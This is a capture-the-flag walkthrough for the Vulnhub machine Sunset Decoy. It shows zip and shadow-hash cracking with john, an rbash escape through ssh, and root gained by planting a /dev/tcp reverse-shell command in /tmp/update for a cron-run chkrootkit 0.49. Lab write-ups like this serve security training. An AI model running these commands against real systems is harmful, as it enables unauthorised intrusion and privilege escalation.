Hi guys! In this article, I’m going to show you how to solve machine named Sunset Decoy on Vulnhub Platform. Sunset Decoy machine is an easy level machine and it contains user and root flag. Unzipping password protected zip file on running web server is first step to take for recon. After having valuable file by decrypting zip file, initial step will be taken. Once having user’s password, ssh login will be next step but at this point a magical move needs to be done to bypass rbash. After bypass process, enumeration will help to find out the way to have root. Exploiting chrootkit vulnerability will help local privilege escalation, and then finally root flag.
ENUMERATION AND USER
I’ve run nmap firstly as always. Done directory fuzzing and some other recon while nmap running but haven’t got any results.
As you see, port 22 and port 80 is open. There is a web service running on port 80 and a zip file on web server. This zip file is password protected. So after downloading this file, we need to crack password of this zip file. To do this, we convert zip file to john format with “ /usr/sbin/zip2john save.zip > save.hash” command.
After converting it, we crack the password with john. To do this, use “ john save.hash –wordlist=rockyou.txt” command.
And we got the password for zip file as “manuel”. After unzipping zip file, we will see that it contains some valuable files that will help us very much. It contains files such as passwd and shadow. We view content of shadow file and get hash of root and user.
We copy root and user’s password hash into hashes file to crack it. See content of hash file below.
Now we are cracking these hashes using “ john hashes.txt –wordlist=rockyou.txt” command.
And we could get password for user as “server”. Now we can login into user by using ssh and get user flag!
Here as you see photo above, we got restricted shell. It means we can not run commands freely. As you see, when I try to enter SV-502 directory it errors like “restricted”. There are some ways to bypass it. We will bypass this by logging in ssh with “bash –noprofile” argument. To do this, let’s run “ssh [email protected] –t “bash –noprofile” command.
So you can see that we can now run “cd” command. And see that there is a log file. Let’s view it.
When we view content of log file, we see it is an pspy output and it shows processes runned on machine. Something got my interest at this point. Chrootkit could be the way. To be sure, I’ve runned pspy on the machine got result as photo below.
It is in cron. So it runs chrootkit automatically. After finding this out, I’ve searched for vulnerabilities found about chrootkit 0.49 and got one.
This is the way for privilege escalation, so root. In description, we find how to exploit it. So it basically says that put reverse shell script in file named update under /tmp directory.
So we are creating a file named update and put “ bash –c ‘ bash –i >& /dev/tcp/ip/port 0>&1’ “ comamnd in it.
Then we listen port that we set on other terminal. After a while we will be gotten shell as root, and root flag!